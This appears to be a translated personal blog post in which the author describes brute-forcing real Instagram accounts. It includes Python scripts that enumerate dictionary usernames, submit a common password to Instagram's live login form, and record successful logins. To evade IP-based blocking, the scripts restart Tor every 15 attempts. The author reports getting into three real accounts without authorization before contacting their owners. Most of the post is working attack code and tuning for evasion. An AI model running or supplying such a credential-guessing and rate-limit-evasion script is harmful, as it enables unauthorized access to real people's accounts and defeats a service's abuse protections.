How I took a little Instagram

It all started after I read an article about the most popular passwords in 2013. Like many, I think, I instantly wanted to check whether these passwords are really so popular. After some deliberation, the choice fell on a social network / photo sharing service - Instagram.

The first steps

The first thing I did was check how exactly the web version of this miracle responds to the input with the correct and incorrect password. Everything turned out to be standard, I was even a little glad. If the password is incorrect from the server, the answer is with code 200, if it is correct, code 302 comes in and redirects to the main page. That's enough, I start writing a script in python, which will substitute the username and password in the form, and then find out whether it came up or not.
')
He looked like this:

import urllib login_data=urllib.urlensource({'username':'username','password':'password','submit':'Login'}) response = urllib.urlopen('https://instagram.com/accounts/login/',login_data) f = open('dex.html','w') f.write(response.read()) f.close() print 'ok' 

The first test gave the error "Enable cookies" ("This page could not be loaded. If you have cookies, please click on it." . ”) I didn’t have much time, so I chose a quick solution to this problem, which I usually use for tests of my creations, namely, mechanize. More precisely, even mechanize.Browser ().

The second version looked like this:

 import mechanize name = 'username' password = 'password' br = mechanize.Browser() br.open('https://instagram.com/accounts/login/') br.select_form(nr = 0) br.form['username'] = name br.form['password'] = password br.submit() f = open('dex.html','w') f.write(br.response().read()) f.close() print 'ok' 

Temporary success

And, lo and behold! With a valid and incorrect login / password pair, everything was worked out as needed. But the server response code in both situations came 200. This is not scary, because in the answer we see the very page that came. Just look at any phrase on the page, saying that the password did not fit. If not, then we are fine, we found a user with a weak password.

It looked like this to me:

 if br.response().read().find('correct username') == -1: print 'YEP' log_list = open('log_list.txt','ab+') log_list.write(name + ' ' + password + '\n') log_list.close() else: print 'NOPE' 

As long as everything went smoothly. I never found the Sitemap, so I connected the standard English word dictionary for ubuntu (/ usr / share / dict / american-english) from which I took all the words without an apostrophe, and the password database was reduced , under the conditions of the experiment, to the base of the above-mentioned article. But from the entire database, a manual search revealed only one password suitable for the service (it does not allow instagrames to use too simple passwords). It has become not so interesting, but did not want to stop. Along the way, I made a check whether there is even a user with such a login so as not to run in vain + to take into account only existing users in the statistics. This is an experiment!

All together it already looked like this:

 import mechanize def check_url(url): p = urlparse(url) conn = httplib.HTTPConnection(p.netloc) conn.request('HEAD', p.path) resp = conn.getresponse() return resp.status < 400 names = open('american-english','r').read().split('\n') password = 'letmein' number = 0 for name in names: if name.find("'") == -1: number += 1 url = 'https://instagram.com/'+name if check_url(url): print 'not exist' else: print str(number) + ' ' + name br = mechanize.Browser() br.open('https://instagram.com/accounts/login/') br.select_form(nr = 0) br.form['username'] = name br.form['password'] = password br.submit() s = br.response().read().find('correct username') if s == -1: print 'YEP' log_list = open('log_list.txt','ab+') log_list.write(name + ' ' + password + '\n') log_list.close() else: print 'NOPE' 

Not the most reliable protection against brute force

After 20 iterations, the instagram began to spit me out with a 403 Forbidden error (access denied). Their server guessed that I was doing something bad. I tried to play with different cookies and browser substitutions. No, I did not let it in, so banyat by ip Need to use a proxy. The fastest solution for anonymous login I found tor. By the method of scientific tyke, it was determined that a change of ip is required approximately after every 15 hits. The car has earned!

Final script:

 import os, socks, socket, mechanize, cookielib, httplib from urlparse import urlparse def check_url(url): p = urlparse(url) conn = httplib.HTTPConnection(p.netloc) conn.request('HEAD', p.path) resp = conn.getresponse() return resp.status < 400 def create_connection(address, timeout=None, source_address=None): sock = socks.socksocket() sock.connect(address) return sock socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050) socket.socket = socks.socksocket socket.create_connection = create_connection names = open('american-english','r').read().split('\n') password = 'letmein' number = 0 for name in names: if name.find("'") == -1: if number%15 == 0: os.system('service tor restart') number += 1 url = 'https://instagram.com/'+name if check_url(url): print 'not exist' else: try: print str(number) + ' ' + name br = mechanize.Browser() br.set_handle_equiv(True) br.set_handle_redirect(True) br.set_handle_robots(False) br.open('https://instagram.com/accounts/login/') br.select_form(nr = 0) br.form['username'] = name br.form['password'] = password br.submit() if br.response().read().find('correct username') == -1: print 'YEP' log_list = open('log_list.txt','ab+') log_list.write(name + ' ' + password + '\n') log_list.close() else: print 'NOPE' except: print 'something wrong' pass 

Left him to work overnight.

About the results.

In the morning I woke up like in the New Year in anticipation, what a gift my hardworking elf left me. In total, 9103 names were verified (far from all of the list, I stopped the script), three of them used a vulnerable password. This is about 0.03% of respondents - not so little. I would be glad if there was at least one. I contacted account holders asking them to change their password. Now in the world 3 people use weak passwords less, protecting their favorite photos.

Thank you all for your attention.